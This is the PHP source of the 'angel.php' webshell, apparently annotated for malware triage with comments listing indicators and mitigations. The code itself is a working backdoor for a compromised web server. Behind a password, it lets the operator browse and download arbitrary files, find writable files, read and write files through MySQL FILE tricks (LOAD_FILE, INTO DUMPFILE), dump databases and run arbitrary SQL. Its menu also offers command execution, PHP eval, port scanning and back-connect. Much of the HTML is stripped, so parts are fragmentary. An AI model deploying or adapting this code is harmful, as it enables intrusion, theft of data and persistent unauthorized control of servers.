angel.php webshell

 
 $value ) {
	if ( IS_GPC ) {
		$value = s_array( $value );
	}
	$$key = $value;
}
/*===================== Program configuration =====================*/
// Static, per-sample settings of the web shell. For triage, the literal values
// in this section (above all the $pass digest) are the simplest strings to
// match on when scanning a web root for copies of this file.
//echo encode_pass('angel');exit;
//angel = ec38fe2a8497e0a8d6d349b3533038cb
// If password verification is wanted, change the login password; leaving it empty disables verification.
// NOTE(review): the value is 32 hex characters, the length of an MD5 digest, but
// encode_pass() is not shown here, so the exact scheme is unconfirmed.
// The later `if ( $pass )` check is what makes an empty value skip authentication.
$pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
// If you need a specific cookie scope, or login misbehaves, change the variables below; otherwise keep the defaults.
// cookie prefix
$cookiepre = '';
// cookie domain
$cookiedomain = '';
// cookie path
$cookiepath = '/';
// cookie lifetime (presumably seconds, i.e. one day; scookie() is not shown here, so confirm there)
$cookielife = 86400;
// File extensions the program considers when searching for writable files.
// The default is applied only when $writabledb is not already set to a truthy value.
! $writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
/*===================== End of configuration =====================*/
// Character-set names offered in the "DBCharset" select boxes of the MySQL forms
// further down the file. The empty first entry is the "no charset chosen" option.
$charsetdb = array(
	'',
	'armscii8',
	'ascii',
	'big5',
	'binary',
	'cp1250',
	'cp1251',
	'cp1256',
	'cp1257',
	'cp850',
	'cp852',
	'cp866',
	'cp932',
	'dec8',
	'euc-jp',
	'euc-kr',
	'gb2312',
	'gbk',
	'geostd8',
	'greek',
	'hebrew',
	'hp8',
	'keybcs2',
	'koi8r',
	'koi8u',
	'latin1',
	'latin2',
	'latin5',
	'latin7',
	'macce',
	'macroman',
	'sjis',
	'swe7',
	'tis620',
	'ucs2',
	'ujis',
	'utf8'
);
// Pick the response Content-Type charset from $charset. $charset is not assigned
// in the visible code; presumably it arrives as a request parameter through the
// `$$key = $value` loop at the top of the file (its header is cut off) - confirm.
// Any other value sends no explicit charset header.
if ( $charset == 'utf8' ) {
	header( "content-Type: text/html; charset=utf-8" );
} elseif ( $charset == 'big5' ) {
	header( "content-Type: text/html; charset=big5" );
} elseif ( $charset == 'gbk' ) {
	header( "content-Type: text/html; charset=gbk" );
} elseif ( $charset == 'latin1' ) {
	// NOTE(review): latin1 normally corresponds to ISO-8859-1; the header sent
	// here says iso-8859-2, which looks like an author slip.
	header( "content-Type: text/html; charset=iso-8859-2" );
} elseif ( $charset == 'euc-kr' ) {
	header( "content-Type: text/html; charset=euc-kr" );
} elseif ( $charset == 'euc-jp' ) {
	header( "content-Type: text/html; charset=euc-jp" );
}
// URL path of this script, used as the redirect target after login and logout.
$self= $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
// Request time; reused later in the LOAD DATA delimiter and in the server-info table.
$timestamp = time();
/*===================== Authentication =====================*/
// Access gate of the shell. $action and $password are not assigned in the visible
// code; presumably they are request parameters turned into globals by the
// `$$key = $value` loop at the top of the file - confirm against the full sample.
//
// Log-analysis notes:
//  - a successful login and a logout both answer with a Location redirect to the
//    script's own path;
//  - after login every request carries a cookie named 'loginpass' (possibly with
//    the $cookiepre prefix; scookie() is not shown) whose value is the same digest
//    that is stored in $pass, so the cookie value itself is a matchable indicator
//    wherever request cookies are logged.

// Logout: overwrite the cookie with an empty value and a lifetime in the past.
if ( $action == "logout" ) {
	scookie( 'loginpass', '', - 86400 * 365 );
	@header( 'Location: ' . $self );
	exit;
}
// Authentication runs only when a password digest is configured.
if ( $pass ) {
	if ( $action == 'login' ) {
		// The submitted password is run through encode_pass() and compared with
		// the stored digest; on a match the digest is stored in the cookie.
		if ( $pass == encode_pass( $password ) ) {
			scookie( 'loginpass', encode_pass( $password ) );
			@header( 'Location: ' . $self );
			exit;
		}
	}
	// Every other request must present a cookie equal to the stored digest.
	// loginpage() is defined elsewhere; presumably it prints the login form and
	// stops execution - otherwise the code below would still run. Confirm.
	if ( $_COOKIE['loginpass'] ) {
		if ( $_COOKIE['loginpass'] != $pass ) {
			loginpage();
		}
	} else {
		loginpage();
	}
}
/*===================== End of authentication =====================*/
$errmsg = '';
// With no action requested, the file manager is the default view.
! $action && $action = 'file';
// Show phpinfo()
// IS_PHPINFO is defined elsewhere; the error text suggests it reflects whether
// phpinfo() is permitted on this host - confirm.
if ( $action == 'phpinfo' ) {
	if ( IS_PHPINFO ) {
		phpinfo();
		exit;
	} else {
		$errmsg = 'phpinfo() function has non-permissible';
	}
}
// Download a file
// $thefile is used as given: the only check in the visible code is file_exists(),
// so any path the PHP process can read can be streamed to the client.
// Defender notes: the response is sent as an attachment with a Content-type of
// "application/x-<extension>", an unusual pattern for a .php URL that can be
// looked for in proxy or WAF logs. Limiting what the PHP process may read
// (open_basedir, file-system permissions of the service account) bounds the
// exposure of this handler.
if ( $doing == 'downfile' && $thefile ) {
	if ( ! @file_exists( $thefile ) ) {
		$errmsg = 'The file you want Downloadable was nonexistent';
	} else {
		$fileinfo = pathinfo( $thefile );
		header( 'Content-type: application/x-' . $fileinfo['extension'] );
		header( 'Content-Disposition: attachment; filename=' . $fileinfo['basename'] );
		header( 'Content-Length: ' . filesize( $thefile ) );
		@readfile( $thefile );
		exit;
	}
}
// Download a database backup directly
// Connects with the host, user and password supplied with the request (mydbconn()
// is defined elsewhere) and sends every selected table through sqldumptable() to
// the client as an attachment named "<dbname>.sql".
// The mysql_* calls used here belong to the legacy ext/mysql extension, which was
// removed in PHP 7.0, so this path only works on older PHP runtimes.
if ( $doing == 'backupmysql' && ! $saveasfile ) {
	if ( ! $table ) {
		$errmsg = 'Please choose the table';
	} else {
		$mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport );
		$filename= basename( $dbname . '.sql' );
		header( 'Content-type: application/unknown' );
		header( 'Content-Disposition: attachment; filename=' . $filename );
		foreach ( $table as $k => $v ) {
			if ( $v ) {
				sqldumptable( $v );
			}
		}
		mysql_close();
		exit;
	}
}
// Download a file through MySQL
// Reads a file by asking the database server for it instead of using PHP file
// functions; the page's own form text states that the DB user needs the FILE
// privilege for this.
// Defender notes:
//  - database-side indicators: a table named tmp_angel being created and dropped,
//    LOAD_FILE() / LOAD DATA LOCAL INFILE statements issued by a web application
//    account, and field/line terminators of the form __angel_<unix time>_eof__;
//  - mitigation: do not grant FILE to application accounts, restrict
//    secure_file_priv, and disable local_infile where it is not needed.
if ( $doing == 'mysqldown' ) {
	if ( ! $dbname ) {
		$errmsg = 'Please input dbname';
	} else {
		$mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport );
		// The existence check is made by PHP on the web server's file system.
		if ( ! file_exists( $mysqldlfile ) ) {
			$errmsg = 'The file you want Downloadable was nonexistent';
		} else {
			// First attempt: LOAD_FILE(); the path is interpolated into the query as given.
			$result = q( "select load_file('$mysqldlfile');" );
			if ( ! $result ) {
				// Fallback when q() reports failure: load the file into a scratch table.
				q( "DROP TABLE IF EXISTS tmp_angel;" );
				q( "CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);" );
				// The timestamp is part of the terminator so that the content is not cut short when
				// reading this script itself or a file that contains __angel_1111111111_eof__.
				q( "LOAD DATA LOCAL INFILE '" . addslashes( $mysqldlfile ) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';" );
				$result = q( "select content from tmp_angel" );
				q( "DROP TABLE tmp_angel" );
			}
			$row = @mysql_fetch_array( $result );
			if ( ! $row ) {
				$errmsg = 'Load file failed ' . mysql_error();
			} else {
				// Send the first column of the fetched row to the client as an attachment.
				$fileinfo = pathinfo( $mysqldlfile );
				header( 'Content-type: application/x-' . $fileinfo['extension'] );
				header( 'Content-Disposition: attachment; filename=' . $fileinfo['basename'] );
				header( "Accept-Length: " . strlen( $row[0] ) );
				echo $row[0];
				exit;
			}
		}
	}
}
?>
	
	
		
		
		
		
	
	
	 'opform' ) );
	makehide( 'action', $action );
	makehide( 'nowpath', $nowpath );
	makehide( 'p1', $p1 );
	makehide( 'p2', $p2 );
	makehide( 'p3', $p3 );
	makehide( 'p4', $p4 );
	makehide( 'p5', $p5 );
	formfoot();
	// Work out which account the script is associated with. The values are
	// presumably what the panel header prints after "User:" - the markup that
	// uses them was stripped from this copy.
	// Defender note: this is host reconnaissance; running PHP workers under a
	// dedicated low-privilege account limits what an intruder gains from it.
	if ( ! function_exists( 'posix_getegid' ) ) {
		// No POSIX extension: fall back to PHP's script-owner functions
		// (these report the owner of the script file, not the process identity).
		$user= @get_current_user();
		$uid = @getmyuid();
		$gid = @getmygid();
		$group = "?";
	} else {
		// POSIX extension available: look up the effective user and group of the process.
		$uid = @posix_getpwuid( @posix_geteuid() );
		$gid = @posix_getgrgid( @posix_getegid() );
		// The lookups return arrays; keep the names, then reduce $uid/$gid to the numeric ids.
		$user= $uid['name'];
		$uid = $uid['uid'];
		$group = $gid['name'];
		$gid = $gid['gid'];
	}
	?>
	
/ User: ()
PHP / Safe Mode: Logout | File Manager | MYSQL Manager | MySQL Upload & Download | Execute Command | PHP Variable | Port Scan | Security information | Eval PHP Code | Back Connect
' ); p( '' ); //查看所有可写文件和目录 $dirdata= array(); $filedata = array(); if ( $view_writable == 'dir' ) { $dirdata= GetWDirList( $nowpath ); $filedata = array(); } elseif ( $view_writable == 'file' ) { $dirdata= array(); $filedata = GetWFileList( $nowpath ); } elseif ( $findstr ) { $dirdata= array(); $filedata = GetSFileList( $nowpath, $findstr, $re ); } else { // 目录列表 //scandir()效率更高 $dirs = @opendir( $dir ); while ( $file = @readdir( $dirs ) ) { $filepath = $nowpath . $file; if ( @is_dir( $filepath ) ) { $dirdb['filename']= $file; $dirdb['mtime'] = @date( 'Y-m-d H:i:s', filemtime( $filepath ) ); $dirdb['dirchmod']= getChmod( $filepath ); $dirdb['dirperm'] = getPerms( $filepath ); $dirdb['fileowner'] = getUser( $filepath ); $dirdb['dirlink'] = $nowpath; $dirdb['server_link'] = $filepath; $dirdata[]= $dirdb; } else { $filedb['filename']= $file; $filedb['size']= sizecount( @filesize( $filepath ) ); $filedb['mtime'] = @date( 'Y-m-d H:i:s', filemtime( $filepath ) ); $filedb['filechmod'] = getChmod( $filepath ); $filedb['fileperm']= getPerms( $filepath ); $filedb['fileowner'] = getUser( $filepath ); $filedb['dirlink'] = $nowpath; $filedb['server_link'] = $filepath; $filedata[]= $filedb; } }// while unset( $dirdb ); unset( $filedb ); @closedir( $dirs ); } @sort( $dirdata ); @sort( $filedata ); $dir_i = '0'; p( '' ); makehide( 'action', 'file' ); makehide( 'thefile' ); makehide( 'doing' ); makehide( 'dir', $nowpath ); foreach ( $dirdata as $key => $dirdb ) { if ( $dirdb['filename'] != '..' && $dirdb['filename'] != '.' ) { if ( $getdir && $getdir == $dirdb['server_link'] ) { $attachsize = dirsize( $dirdb['server_link'] ); $attachsize = is_numeric( $attachsize ) ? sizecount( $attachsize ) : 'Unknown'; } else { $attachsize = 'Stat'; } $thisbg = bg(); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); $dir_i ++; } else { if ( $dirdb['filename'] == '..' 
) { p( '' ); p( '' ); p( '' ); } } } p( '' ); $file_i = '0'; foreach ( $filedata as $key => $filedb ) { if ( $filedb['filename'] != '..' && $filedb['filename'] != '.' ) { $fileurl = str_replace( $_SERVER["DOCUMENT_ROOT"], '', $filedb['server_link'] ); $thisbg= bg(); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); $file_i ++; } } p( '' ); p( '' ); p( '
'createdir' ) ); makehide( 'newdirname' ); makehide( 'dir', $nowpath ); formfoot(); formhead( array( 'name' => 'fileperm' ) ); makehide( 'newperm' ); makehide( 'pfile' ); makehide( 'dir', $nowpath ); formfoot(); formhead( array( 'name' => 'copyfile' ) ); makehide( 'sname' ); makehide( 'tofile' ); makehide( 'dir', $nowpath ); formfoot(); formhead( array( 'name' => 'rename' ) ); makehide( 'oldname' ); makehide( 'newfilename' ); makehide( 'dir', $nowpath ); formfoot(); formhead( array( 'name' => 'fileopform', 'target' => '_blank' ) ); makehide( 'action' ); makehide( 'opfile' ); makehide( 'dir' ); formfoot(); formhead( array( 'name' => 'getsize' ) ); makehide( 'getdir' ); makehide( 'dir' ); formfoot(); $free = @disk_free_space( $nowpath ); ! $free && $free = 0; $all = @disk_total_space( $nowpath ); ! $all && $all = 0; $used = $all - $free; p( '

File Manager - Current disk free ' . sizecount( $free ) . ' of ' . sizecount( $all ) . ' (' . @round( 100 / ( $all / $free ), 2 ) . '%)

' ); $cwd_links = ''; $path= explode( '/', $nowpath ); $n = count( $path ); for ( $i = 0; $i < $n - 1; $i ++ ) { $cwd_links .= '' . $path[ $i ] . '/'; } ?>
()
Drives ) { echo '
'; $DriveTypeDB = array( 0 => 'Unknow', 1 => 'Removable', 2 => 'Fixed', 3 => 'Network', 4 => 'CDRom', 5 => 'RAM Disk' ); $comma = ''; foreach ( $obj->Drives as $drive ) { if ( $drive->Path ) { p( $comma . 'Path . '/\');">' . $DriveTypeDB[ $drive->DriveType ] . '(' . $drive->Path . ')' ); $comma = '|'; } } echo '
'; } } ?>
' ); p( '
' ); p( 'WebRoot' ); p( ' | ScriptPath' ); p( ' | View All' ); p( ' | View Writable ( Directory' ); p( ' | File )' ); p( ' | Create Directory | Create File' ); p( '
Find string in files(current folder): Type: Regular expressions
 FilenameLast modifiedSizeChmod / PermsAction
' . $dirdb['filename'] . '' . $dirdb['mtime'] . '' . $attachsize . '' ); p( '' . $dirdb['dirchmod'] . ' / ' ); p( '' . $dirdb['dirperm'] . '' . $dirdb['fileowner'] . 'Rename
-Parent Directory
' . ( ( strpos( $filedb['server_link'], $_SERVER["DOCUMENT_ROOT"] ) !== false ) ? '' . $filedb['filename'] . '' : $filedb['filename'] ) . '' . $filedb['mtime'] . '' . $filedb['size'] . '' ); p( '' . $filedb['filechmod'] . ' / ' ); p( '' . $filedb['fileperm'] . '' . $filedb['fileowner'] . '' ); p( 'Down | ' ); p( 'Copy | ' ); p( 'Edit | ' ); p( 'Rename' ); p( '
 FilenameLast modifiedSizeChmod / PermsAction
Delete selected' . $dir_i . ' directories / ' . $file_i . ' files
' ); }// end dir elseif ( $action == 'sqlfile' ) { if ( $doing == "mysqlupload" ) { $file = $_FILES['uploadfile']; $filename = $file['tmp_name']; if ( file_exists( $savepath ) ) { m( 'The goal file has already existed' ); } else { if ( ! $filename ) { m( 'Please choose a file' ); } else { $fp = @fopen( $filename, 'r' ); $contents = @fread( $fp, filesize( $filename ) ); @fclose( $fp ); $contents = bin2hex( $contents ); if ( ! $upname ) { $upname = $file['name']; } $mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); $result= q( "SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';" ); m( $result ? 'Upload success' : 'Upload has failed: ' . mysql_error() ); } } } ?> 'MYSQL Information', 'name' => 'dbinfo' ) ); makehide( 'action', 'sqlfile' ); p( '

' ); p( 'DBHost:' ); makeinput( array( 'name' => 'dbhost', 'size' => 20, 'value' => $dbhost ) ); p( ':' ); makeinput( array( 'name' => 'dbport', 'size' => 4, 'value' => $dbport ) ); p( 'DBUser:' ); makeinput( array( 'name' => 'dbuser', 'size' => 15, 'value' => $dbuser ) ); p( 'DBPass:' ); makeinput( array( 'name' => 'dbpass', 'size' => 15, 'value' => $dbpass ) ); p( 'DBName:' ); makeinput( array( 'name' => 'dbname', 'size' => 15, 'value' => $dbname ) ); p( 'DBCharset:' ); makeselect( array( 'name' => 'charset', 'option' => $charsetdb, 'selected' => $charset, 'nokey'=> 1 ) ); p( '

' ); formfoot(); p( '
' ); p( '

Upload file

' ); p( '

This operation the DB user must has FILE privilege

' ); p( '

Save path(fullpath): Choose a file: Upload

' ); p( '

Download file

' ); p( '

File: Download

' ); makehide( 'dbhost' ); makehide( 'dbport' ); makehide( 'dbuser' ); makehide( 'dbpass' ); makehide( 'dbname' ); makehide( 'charset' ); makehide( 'doing' ); makehide( 'action', 'sqlfile' ); p( '
' ); } elseif ( $action == 'mysqladmin' ) { ! $dbhost && $dbhost = 'localhost'; ! $dbuser && $dbuser = 'root'; ! $dbport && $dbport = '3306'; $dbform = ''; if ( isset( $dbhost ) ) { $dbform .= "\n"; } if ( isset( $dbuser ) ) { $dbform .= "\n"; } if ( isset( $dbpass ) ) { $dbform .= "\n"; } if ( isset( $dbport ) ) { $dbform .= "\n"; } if ( isset( $dbname ) ) { $dbform .= "\n"; } if ( isset( $charset ) ) { $dbform .= "\n"; } if ( $doing == 'backupmysql' && $saveasfile ) { if ( ! $table ) { m( 'Please choose the table' ); } else { $mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); $fp= @fopen( $path, 'w' ); if ( $fp ) { foreach ( $table as $k => $v ) { if ( $v ) { sqldumptable( $v, $fp ); } } fclose( $fp ); $fileurl = str_replace( SA_ROOT, '', $path ); m( 'Database has success backup to ' . $path . '' ); mysql_close(); } else { m( 'Backup failed' ); } } } if ( $insert && $insertsql ) { $keystr = $valstr = $tmp = ''; foreach ( $insertsql as $key => $val ) { if ( $val ) { $keystr .= $tmp . $key; $valstr .= $tmp . "'" . addslashes( $val ) . "'"; $tmp = ','; } } if ( $keystr && $valstr ) { $mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); m( q( "INSERT INTO $tablename ($keystr) VALUES ($valstr)" ) ? 'Insert new record of success' : mysql_error() ); } } if ( $update && $insertsql && $base64 ) { $valstr = $tmp = ''; foreach ( $insertsql as $key => $val ) { $valstr .= $tmp . $key . "='" . addslashes( $val ) . "'"; $tmp = ','; } if ( $valstr ) { $where = base64_decode( $base64 ); $mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); m( q( "UPDATE $tablename SET $valstr WHERE $where LIMIT 1" ) ? 'Record updating' : mysql_error() ); } } if ( $doing == 'del' && $base64 ) { $where= base64_decode( $base64 ); $delete_sql = "DELETE FROM $tablename WHERE $where"; $mysqllink= mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); m( q( "DELETE FROM $tablename WHERE $where" ) ? 
'Deletion record of success' : mysql_error() ); } if ( $tablename && $doing == 'drop' ) { $mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); if ( q( "DROP TABLE $tablename" ) ) { m( 'Drop table of success' ); $tablename = ''; } else { m( mysql_error() ); } } formhead( array( 'title' => 'MYSQL Manager' ) ); makehide( 'action', 'mysqladmin' ); p( '

' ); p( 'DBHost:' ); makeinput( array( 'name' => 'dbhost', 'size' => 20, 'value' => $dbhost ) ); p( ':' ); makeinput( array( 'name' => 'dbport', 'size' => 4, 'value' => $dbport ) ); p( 'DBUser:' ); makeinput( array( 'name' => 'dbuser', 'size' => 15, 'value' => $dbuser ) ); p( 'DBPass:' ); makeinput( array( 'name' => 'dbpass', 'size' => 15, 'value' => $dbpass ) ); p( 'DBCharset:' ); makeselect( array( 'name' => 'charset', 'option' => $charsetdb, 'selected' => $charset, 'nokey'=> 1 ) ); makeinput( array( 'name'=> 'connect', 'value' => 'Connect', 'type'=> 'submit', 'class' => 'bt' ) ); p( '

' ); formfoot(); //操作记录 formhead( array( 'name' => 'recordlist' ) ); makehide( 'doing' ); makehide( 'action', 'mysqladmin' ); makehide( 'base64' ); makehide( 'tablename' ); p( $dbform ); formfoot(); //选定数据库 formhead( array( 'name' => 'setdbname' ) ); makehide( 'action', 'mysqladmin' ); p( $dbform ); if ( ! $dbname ) { makehide( 'dbname' ); } formfoot(); //选定表 formhead( array( 'name' => 'settable' ) ); makehide( 'action', 'mysqladmin' ); p( $dbform ); makehide( 'tablename' ); makehide( 'page', $page ); makehide( 'doing' ); formfoot(); $cachetables = array(); $pagenum = 30; $page= intval( $page ); if ( $page ) { $start_limit = ( $page - 1 ) * $pagenum; } else { $start_limit = 0; $page= 1; } if ( isset( $dbhost ) && isset( $dbuser ) && isset( $dbpass ) && isset( $connect ) ) { $mysqllink = mydbconn( $dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport ); //获取数据库信息 $mysqlver = mysql_get_server_info(); p( '

MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '

' ); $highver = $mysqlver > '4.1' ? 1 : 0; //获取数据库 $query = q( "SHOW DATABASES" ); $dbs = array(); $dbs[] = '-- Select a database --'; while ( $db = mysql_fetch_array( $query ) ) { $dbs[ $db['Database'] ] = $db['Database']; } makeselect( array( 'title'=> 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline'=> 1 ) ); $tabledb = array(); if ( $dbname ) { p( '

' ); p( 'Current dababase: ' . $dbname . '' ); if ( $tablename ) { p( ' | Current Table: ' . $tablename . ' [ Insert | Structure | Drop ]' ); } p( '

' ); mysql_select_db( $dbname ); $getnumsql = ''; $runquery= 0; if ( $sql_query ) { $runquery = 1; } $allowedit = 0; if ( $tablename && ! $sql_query ) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query . " LIMIT $start_limit, $pagenum"; $allowedit = 1; } p( '
' ); p( '

Run SQL query/queries on database ' . $dbname . ':

' ); makehide( 'tablename', $tablename ); makehide( 'action', 'mysqladmin' ); p( $dbform ); p( '
' ); if ( $tablename || ( $runquery && $sql_query ) ) { if ( $doing == 'structure' ) { $result = q( "SHOW FULL COLUMNS FROM $tablename" ); $rowdb= array(); while ( $row = mysql_fetch_array( $result ) ) { $rowdb[] = $row; } p( '

Structure

' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); foreach ( $rowdb as $row ) { $thisbg = bg(); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); } tbfoot(); $result = q( "SHOW INDEX FROM $tablename" ); $rowdb= array(); while ( $row = mysql_fetch_array( $result ) ) { $rowdb[] = $row; } p( '

Indexes

' ); p( '
FieldTypeCollationNullKeyDefaultExtraPrivilegesComment
' . $row['Field'] . '' . $row['Type'] . '' . $row['Collation'] . ' ' . $row['Null'] . ' ' . $row['Key'] . ' ' . $row['Default'] . ' ' . $row['Extra'] . ' ' . $row['Privileges'] . ' ' . $row['Comment'] . ' 
' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); foreach ( $rowdb as $row ) { $thisbg = bg(); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); } tbfoot(); } elseif ( $doing == 'insert' || $doing == 'edit' ) { $result = q( 'SHOW COLUMNS FROM ' . $tablename ); while ( $row = mysql_fetch_array( $result ) ) { $rowdb[] = $row; } $rs = array(); if ( $doing == 'insert' ) { p( '

Insert new line in ' . $tablename . ' table »

' ); } else { p( '

Update record in ' . $tablename . ' table »

' ); $where= base64_decode( $base64 ); $result = q( "SELECT * FROM $tablename WHERE $where LIMIT 1" ); $rs = mysql_fetch_array( $result ); } p( '' ); p( $dbform ); makehide( 'action', 'mysqladmin' ); makehide( 'tablename', $tablename ); p( '
KeynameTypeUniquePackedSeq_in_indexFieldCardinalityCollationNullComment
' . $row['Key_name'] . '' . $row['Index_type'] . '' . ( $row['Non_unique'] ? 'No' : 'Yes' ) . ' ' . ( $row['Packed'] === null ? 'No' : $row['Packed'] ) . ' ' . $row['Seq_in_index'] . '' . $row['Column_name'] . ( $row['Sub_part'] ? '(' . $row['Sub_part'] . ')' : '' ) . ' ' . ( $row['Cardinality'] ? $row['Cardinality'] : 0 ) . ' ' . $row['Collation'] . ' ' . $row['Null'] . ' ' . $row['Comment'] . ' 
' ); foreach ( $rowdb as $row ) { if ( $rs[ $row['Field'] ] ) { $value = htmlspecialchars( $rs[ $row['Field'] ] ); } else { $value = ''; } $thisbg = bg(); p( '' ); if ( $row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI' ) { p( '' ); } else { p( '' ); } } if ( $doing == 'insert' ) { p( '' ); } else { p( '' ); makehide( 'base64', $base64 ); } p( '
' . $row['Field'] . '
' . $row['Type'] . '
' . $value . ' 
' . $row['Field'] . '
' . $row['Type'] . '
' ); } else { $querys = @explode( ';', $sql_query ); foreach ( $querys as $num => $query ) { if ( $query ) { p( "

Query#{$num} : " . htmlspecialchars( $query, ENT_QUOTES ) . "

" ); switch ( qy( $query ) ) { case 0: p( '

Error : ' . mysql_error() . '

' ); break; case 1: if ( strtolower( substr( $query, 0, 13 ) ) == 'select * from' ) { $allowedit = 1; } if ( $getnumsql ) { $tatol = mysql_num_rows( q( $getnumsql ) ); $multipage = multi( $tatol, $pagenum, $page, $tablename ); } if ( ! $tablename ) { $sql_line = str_replace( array( "\r", "\n", "\t" ), array( ' ', ' ', ' ' ), trim( htmlspecialchars( $query ) ) ); $sql_line = preg_replace( "/\/\*[^(\*\/)]*\*\//i", " ", $sql_line ); preg_match_all( "/from\s+`{0,1}([\w]+)`{0,1}\s+/i", $sql_line, $matches ); $tablename = $matches[1][0]; } /*********************/ $getfield = q( "SHOW COLUMNS FROM $tablename" ); $rowdb= array(); $keyfied= ''; //主键字段 while ( $row = @mysql_fetch_assoc( $getfield ) ) { $rowdb[ $row['Field'] ]['Key'] = $row['Key']; $rowdb[ $row['Field'] ]['Extra'] = $row['Extra']; if ( $row['Key'] == 'UNI' || $row['Key'] == 'PRI' ) { $keyfied = $row['Field']; } } /*********************/ //直接浏览表按照主键降序排列 if ( $keyfied && strtolower( substr( $query, 0, 13 ) ) == 'select * from' ) { $query = str_replace( " LIMIT ", " order by $keyfied DESC LIMIT ", $query ); } $result = q( $query ); p( $multipage ); p( '' ); p( '' ); if ( $allowedit ) { p( '' ); } $fieldnum = @mysql_num_fields( $result ); for ( $i = 0; $i < $fieldnum; $i ++ ) { $name = @mysql_field_name( $result, $i ); $type = @mysql_field_type( $result, $i ); $len= @mysql_field_len( $result, $i ); p( "" ); } p( '' ); while ( $mn = @mysql_fetch_assoc( $result ) ) { $thisbg = bg(); p( '' ); $where = $tmp = $b1 = ''; //选取条件字段用 foreach ( $mn as $key => $inside ) { if ( $inside ) { //查找主键、唯一属性、自动增加的字段,找到就停止,否则组合所有字段作为条件。 if ( $rowdb[ $key ]['Key'] == 'UNI' || $rowdb[ $key ]['Extra'] == 'auto_increment' || $rowdb[ $key ]['Key'] == 'PRI' ) { $where = $key . "='" . addslashes( $inside ) . "'"; break; } $where .= $tmp . $key . "='" . addslashes( $inside ) . 
"'"; $tmp = ' AND '; } } //读取记录用 foreach ( $mn as $key => $inside ) { $b1 .= ''; } $where = base64_encode( $where ); if ( $allowedit ) { p( '' ); } p( $b1 ); p( '' ); unset( $b1 ); } p( '' ); if ( $allowedit ) { p( '' ); } $fieldnum = @mysql_num_fields( $result ); for ( $i = 0; $i < $fieldnum; $i ++ ) { $name = @mysql_field_name( $result, $i ); $type = @mysql_field_type( $result, $i ); $len= @mysql_field_len( $result, $i ); p( "" ); } p( '' ); tbfoot(); p( $multipage ); break; case 2: $ar = mysql_affected_rows(); p( '

affected rows : ' . $ar . '

' ); break; } } } } } else { $query = q( "SHOW TABLE STATUS" ); $table_num = $table_rows = $data_size = 0; $tabledb = array(); while ( $table = mysql_fetch_array( $query ) ) { $data_size= $data_size + $table['Data_length']; $table_rows = $table_rows + $table['Rows']; $table['Data_length'] = sizecount( $table['Data_length'] ); $table_num ++; $tabledb[] = $table; } $data_size = sizecount( $data_size ); unset( $table ); p( '
Action$name
$type($len)" . ( ( $rowdb[ $name ]['Key'] == 'UNI' || $rowdb[ $name ]['Key'] == 'PRI' ) ? ' - PRIMARY' : '' ) . ( $rowdb[ $name ]['Extra'] == 'auto_increment' ? ' - Auto' : '' ) . "
' . html_clean( $inside ) . ' Edit | Del
Action$name
$type($len)" . ( ( $rowdb[ $name ]['Key'] == 'UNI' || $rowdb[ $name ]['Key'] == 'PRI' ) ? ' - PRIMARY' : '' ) . ( $rowdb[ $name ]['Extra'] == 'auto_increment' ? ' - Auto' : '' ) . "
' ); p( '' ); makehide( 'action', 'mysqladmin' ); p( $dbform ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); if ( $highver ) { p( '' ); p( '' ); } p( '' ); p( '' ); foreach ( $tabledb as $key => $table ) { $thisbg = bg(); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); if ( $highver ) { p( '' ); p( '' ); } p( '' ); p( '' ); } p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); if ( $highver ) { p( '' ); p( '' ); } p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( '' ); p( "" ); makehide( 'doing', 'backupmysql' ); formfoot(); p( "
 NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
' . $table['Name'] . '' . $table['Rows'] . '' . $table['Data_length'] . '' . $table['Create_time'] . ' ' . $table['Update_time'] . ' ' . $table['Engine'] . '' . $table['Collation'] . 'Insert | Structure | Drop
NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
 Total tables: ' . $table_num . '' . $table_rows . '' . $data_size . ' 
Save as file
